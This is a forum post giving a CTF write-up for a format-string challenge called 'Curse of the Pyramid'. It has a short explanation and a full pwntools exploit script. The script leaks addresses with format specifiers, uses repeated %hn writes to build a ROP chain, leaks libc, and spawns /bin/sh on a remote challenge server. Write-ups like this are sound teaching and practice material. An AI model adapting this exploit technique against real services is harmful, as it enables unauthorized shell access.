首页
论坛
专栏
课程

[分享]咲夜南梦 第三题:金字塔的诅咒 WP

2019-6-12 08:39 203

[分享]咲夜南梦 第三题:金字塔的诅咒 WP

2019-6-12 08:39
203
由于不能直接通过read将数据写到栈里,所以只能通过栈内某一个地址指向栈内较近的地址,然后被指向的地址必须也是指向栈内的某一个地址。
这样就可以以printf第一个指针修改第二指针的值,控制住第二指针低位,然后printf第二个指针修改第二指针所指向的值,实现2字节栈内局部区域无限写
exploit.py如下
from pwn import *
context.log_level = "debug"
#sh = process("./format")
lib = ELF("libc-2.23.so")
sh = remote("152.136.18.34",9999)
elf = ELF("format")
base_addr = 0
ret_addr = 0
ret2addr = 0
def getBaseAddress():
    global base_addr
    sh.recvuntil("Choice:")
    sh.sendline("1")
    sh.recvuntil("What do tou want to say:")
    sh.sendline("%3$p")
    sh.recvuntil("0x")
    base_addr = int(sh.recv(8),16)
    base_addr = (base_addr>>12) << 12
    log.success("base_addr :"+hex(base_addr))
def getRetAddress():
    global ret_addr
    sh.recv()
    sh.sendline("1")
    sh.recvuntil("What do tou want to say:")
    sh.sendline("%5$p")
    sh.recvuntil("0x")
    ret_addr = int(sh.recv(8),16)
    ret_addr = (ret_addr - 0xD4) + 60
    log.success("ret_addr :"+hex(ret_addr))
def getRet2Address():
    global ret2addr
    sh.recv()
    sh.sendline("1")
    sh.recvuntil("What do tou want to say:")
    sh.sendline("%15$p")
    sh.recvuntil("0x")
    ret2addr = int(sh.recv(8),16)
    log.success("ret2addr  :" + hex(ret2addr))
def inputMsg(msg):
    sh.recvuntil("Choice:")
    sh.sendline("1")
    sh.recvuntil("say:")
    sh.sendline(msg)
def writeByte(byte,offset):
    _offset = (ret_addr + offset) % 0x10000
    if(byte == 0):
       inputMsg("%." + str(_offset) + "d%5$hn")
       inputMsg("%53$hn")
    else:
       inputMsg("%." + str(_offset) + "d%5$hn")
       inputMsg("%." + str(byte) + "d%53$hn")
def write2Bytes(bytes,offset):
    _offset = offset
    writeByte(bytes % 0x10000,_offset)
    writeByte(bytes >> 16,_offset+2)
    return _offset + 4
if __name__ == '__main__':
    # 0xff889254 - 0xff889180 = 0xD4
    # 0xffc25204 - 0xffc25130 = 0xD4
    global base_addr
    global ret2addr
    global ret_addr
    pop_ret = 0x00000585
    getBaseAddress()
    getRetAddress()
    getRet2Address()
    offset = 0;
    pop_ebx_ret = 0x00000585
    pop_ebp_ret = 0x000009eb
    pop3_ret = 0x000009e9
    offset = write2Bytes(pop_ebx_ret + base_addr,offset)
    offset = write2Bytes(base_addr + 0x1FB0 , offset)
    offset = write2Bytes(base_addr+elf.plt['puts'],offset)
    offset = write2Bytes(pop_ebp_ret + base_addr,offset)
    offset = write2Bytes(base_addr+elf.got['__libc_start_main'],offset)
    offset = write2Bytes(base_addr+elf.plt['read'],offset)
    offset = write2Bytes(pop3_ret+base_addr,offset)
    offset = write2Bytes(0,offset)
    offset = write2Bytes(ret_addr+offset - 8,offset)
    offset = write2Bytes(100,offset)
    sh.sendline("2")
    sh.recvuntil("Choice:")
    libc = u32(sh.recv(4))
    log.success("libc :" + hex(libc))
#    system_addr = libc + 0x24470
#    binsh_addr = libc + 0x16533f
    system_addr = libc - lib.symbols['__libc_start_main'] + lib.symbols['system']
    binsh_addr = libc - lib.symbols['__libc_start_main'] + next(lib.search("/bin/sh"))
    payload = p32(system_addr) + p32(0) + p32(binsh_addr)
    sh.sendline(payload)
    sh.interactive()


[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

最新回复 (0)
游客
登录 | 注册 方可回帖
返回